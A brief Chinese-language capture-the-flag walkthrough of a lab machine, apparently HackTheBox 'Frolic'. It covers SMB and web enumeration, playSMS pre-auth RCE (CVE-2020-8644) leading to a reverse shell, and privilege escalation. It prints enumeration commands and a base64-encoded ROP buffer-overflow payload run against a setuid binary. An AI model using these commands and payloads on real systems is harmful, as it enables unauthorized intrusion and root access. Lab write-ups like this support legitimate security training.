
nmap扫描



开放有两个http端口


弱口令登不上,扫目录
扫目录的过程中,看到445和139开放了Samba,也尝试一下
enum4linux -a 10.10.10.111


smbclient \\\\WORKGROUP\\print -I 10.10.10.111 -N

没用
扫描目录结果


发现一个admin页面登录框

不知道密码
backup下发现user.txt和password.txt



用发现的账号密码去尝试登录admin页面

密码不对,而且还有登录限制
test页面是个phpinfo页面

dev目录下面应该有东西

继续扫

dev/test下载了一个文件

没啥信息
dev/backup下发现一个目录


打开发现是一个playsms的cms登录框
看看有没有exp

尝试过后发现大多都需要身份验证,最后一个给出了漏洞详细地址

https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/

貌似是个ssti注入,payload给出来了,试试

可行,弹个shell

准备个php反弹文件,让他下载

提权


pkexec和脏牛,但这靶机同样gcc编译问题,无法编译exp,而且,就算在本地静态编译好后让靶机下载,还是无法运行
在ayush家目录.binary下找到一个rop二进制文件

按官方解法应该是缓冲区溢出,找了半天找到个wp,但真麻烦啊,而且目前已知消息是官方已经取消了缓冲区溢出考点,所以,懒得动手了,找了个exp直接一把梭哈
https://bigb0ss.medium.com/htb-frolic-writeup-936f81e6a1e0

这是python2写的,简单修改一下

之后运行

echo -n "QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQaA95bfQeeS3C0r3two=" | base64 -d > /dev/shm/payload
./rop $(cat /dev/shm/payload)
